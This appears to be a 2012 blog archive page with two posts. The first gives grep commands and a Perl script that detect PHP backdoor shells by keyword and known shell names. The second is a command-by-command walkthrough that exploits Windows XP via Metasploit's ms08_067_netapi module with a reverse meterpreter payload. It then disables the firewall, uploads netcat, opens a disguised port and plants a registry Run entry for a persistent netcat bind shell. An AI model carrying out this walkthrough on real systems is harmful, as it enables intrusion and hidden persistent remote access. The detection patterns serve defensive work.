Archive for the ‘BackDoor’ Category

How to find backdoor PHP shell scripts on a server

17 czerwca, 2012 1 komentarz

How to find backdoor PHP shell scripts on a server

When hackers get access to your website server, they sometimes install a backdoor shell script designed to allow them to regain entry even after you’ve cleaned up the site, repaired the original security hole that allowed the hack to occur, otherwise improved site security, and even installed measures to try to lock the hackers out.

A backdoor script can be called from a browser like any other web page. It gives its user a web page interface where they can download and upload, view or modify files, create directories, and otherwise manage the site using PHP’s ability to read and write files and pass operating system commands through to the operating system.

One way to find these scripts is by searching website access logs for the suspicious lines that can be generated when someone uses the scripts to modify site files.

Backdoor scripts often need to use PHP commands that most legitimate scripts don’t, so you can search the files in your site for those commands. There are search utility programs you can use for finding text in files:

  • passthru
  • shell_exec
  • system
  • phpinfo
  • base64_decode
  • edoced_46esab
  • chmod
  • mkdir
  • „ (backticks with an operating system command between them)
  • fopen
  • fclose
  • readfile

On a Linux server, the grep program is already installed as part of the operating system. The only problem is figuring out how to launch it.

If you have command line access to your server (SSH), there’s no problem. You can run it from the command line and have the results displayed to you.

Sample text searches for suspicious PHP code.

Do the search once for each of the suggested PHP keywords listed above.

grep -Rn "mkdir *(" public_html/


grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" public_html/

Or we can use the following script ( source )

#!/usr/bin/perl -w
#usage: ./ <sensitivity 1-50> <directory to scan>
use strict;
use File::Find;
my $sens = <a href="">shift</a>  || 10;
my $folder = <a href="">shift</a> || './';
find(\&backdoor, "$folder");
sub backdoor {
    if ((/\.(php|txt)/)){
       <a href="">open</a> (my $IN,"<$_") || <a href="">die</a> "can not open datei $File::Find::name: $!";
       my @file =  <$IN>;
       #maybe evil stuffs
       my $score = <a href="">grep</a> (/function_exists\(|phpinfo\(|safe_?mode|shell_exec\(|popen\(|passthru\(|system\(|myshellexec\(|exec\(|getpwuid\(|getgrgid  \(|fileperms\(/i,@file);
       #probably evil stuffs
       my $tempscore = <a href="">grep</a>(/\`\$\_(post|request|get).{0,20}\`|(include|require|eval|system|passthru|shell_exec).{0,10}\$\_(post|request|get)|eval.{0,10}base64_decode|back_connect|backdoor|r57|PHPJackal|PhpSpy|GiX|Fx29SheLL|w4ck1ng|milw0rm|PhpShell|k1r4|FeeLCoMz|FaTaLisTiCz|Ve_cENxShell|UnixOn|C99madShell|Spamfordz|Locus7s|c100|c99|x2300|cgitelnet|webadmin|cybershell|STUNSHELL|Pr!v8|PHPShell|KaMeLeOn|S4T|oRb|tryag|sniper|noexecshell|\/etc\/passwd|revengans/i, @file);
       $score +=  50 *  $tempscore;
       <a href="">print</a> "$score - Possible backdoor : $File::Find::name\n" if ($score > $sens-1 );
       <a href="">close</a> $IN;
       <a href="">open</a> (my $IN,"<$_") || (<a href="">print</a> "can not open datei $File::Find::name: $!" && next);
       <a href="">print</a> "5000 - Possible backdoor (php in non-php file): $File::Find::name\n" if <a href="">grep</a> /(\<\?php|include(\ |\())/i, <$IN>;
       <a href="">close</a> $IN;


Web Shell Detection Using NeoPI

Kategorie:BackDoor Tagi: ,

Creating a Netcat Backdoor on a Windows XP

6 czerwca, 2012 2 Komentarze

Creating a Netcat  Backdoor on a Windows XP 

Netcat is a versatile tool that can perform a multitude of TCP/IP functions. One very useful feature, particularly for a penetration tester, is the ability to shovel a shell from one system to another. In this section, we’ll use this feature to access a remote backdoor on a Windows XP (Firewall is ON ) system. A backdoor is a communication channel that will provide us with a remote command shell of a previously exploited system (victim), allowing us to access the system at a later time. In this section, I will demonstrate various ways to use and create a backdoor on a Windows XP (Firewall is ON )  victim host.

Run Metasploit Console :

       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ — –=[ 869 exploits – 480 auxiliary – 144 post
+ — –=[ 250 payloads – 27 encoders – 8 nops
       =[ svn r15401 updated today (2012.06.07)

Scan Target with nmap

msf > namp
[-] Unknown command: namp.
msf > nmap
[*] exec: nmap
Nmap scan report for
Host is up (0.00s latency).
Not shown: 998 filtered ports
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds    # OPEN !!!

Choose exploit for the target ( Windows XP EN SP2 )

Microsoft Server Service Relative Path Stack Corruption

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show targets
Exploit targets:

   Id  Name
   —  —-
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (AlwaysOn NX)
   4   Windows XP SP2 English (NX)
   5   Windows XP SP3 English (AlwaysOn NX)
   6   Windows XP SP3 English (NX)
   7   Windows 2003 SP0 Universal
   8   Windows 2003 SP1 English (NO NX)
   9   Windows 2003 SP1 English (NX)
   10  Windows 2003 SP1 Japanese (NO NX)
   11  Windows 2003 SP2 English (NO NX)
   12  Windows 2003 SP2 English (NX)
   13  Windows 2003 SP2 German (NO NX)
   14  Windows 2003 SP2 German (NX)

Choose payload for the target ( Windows XP EN SP2 )

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set RHOST
msf  exploit(ms08_067_netapi) > set LHOST

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   —-     —————  ——–  ———–
   RHOST  yes       The target address
   RPORT    445                         yes       Set the SMB service port    # This Port is Open !!!
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   —-      —————  ——–  ———–
   EXITFUNC  thread               yes       Exit technique: seh, thread, process, none
   LHOST    yes       The listen address
   LPORT     4444                       yes       The listen port

Exploit target:

   Id  Name
   —  —-
   0   Automatic Targeting

Exploit ( Windows XP EN SP2 )

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 2 opened ( -> at 2012-06-07 13:28:59 +0200


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM   # SYSTEM !!!!!
meterpreter > shell
Process 240 created.
Channel 1 created.

Runing shell on Windows XP and  DISABLE Firewall:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>Netsh firewall set opmode disable         # Disable FireWall
Netsh firewall set opmode disable
Ok.                                                           # It's OK - FireWall is OFF

In the next step we return to meterpreter and upload netcat to Windows XP:

meterpreter > upload c:\\tools\\nc.exe c:\\windows\\system32\\   # Upload netcat from my local machine to windows xp
[*] uploading  : c:\tools\nc.exe -> c:\windows\system32\
[*] uploaded   : c:\tools\nc.exe -> c:\windows\system32\\nc.exe   # Upload status – Ok

meterpreter > shell
Process 976 created.
Channel 3 created.

Open new TCP Port – No.1234

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall show opmode          # show firewall stsus
netsh firewall show opmode

Domain profile configuration:
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
Operational mode                  = Disable               # firewall is OFF
Exception mode                    = Enable

Local Area Connection firewall configuration:
Operational mode                  = Enable

C:\WINDOWS\system32>Netsh firewall set opmode mode = enable exceptions = enable
profile = all
Netsh firewall set opmode mode = enable exceptions = enable profile = all
Ok. # Firewall is On and excepions enable

C:\WINDOWS\system32>netsh firewall add portopening TCP 1234 "Windows Firewall Reporting
netsh firewall add portopening TCP 1234 "Windows Firewall Reporting
Agent" enable all
Ok.     # Open TCP port 1234

C:\WINDOWS\system32>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Standard profile:
Port   Protocol  Mode     Name
1234   TCP       Enable   Windows Firewall Reporting   # my new port
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Install Windows BackDoor Shell

C:\WINDOWS\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe"

C:\WINDOWS\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe"

The operation completed successfully  # It's OK!



Now the next time a user logs on to the system, the Netcat backdoor command is triggered and sends a command prompt to our attack system.

And …

wmic:root\cli>startup list full
Command=c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe  # not hiden
User=All Users

Working OR Not ?

from another machine, run…

c:\tools>nc -v 1234
CASH-F32CDFF50A [] 1234 (?) open

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\metasploit>

It’s working !!!


Kategorie:BackDoor, FireWall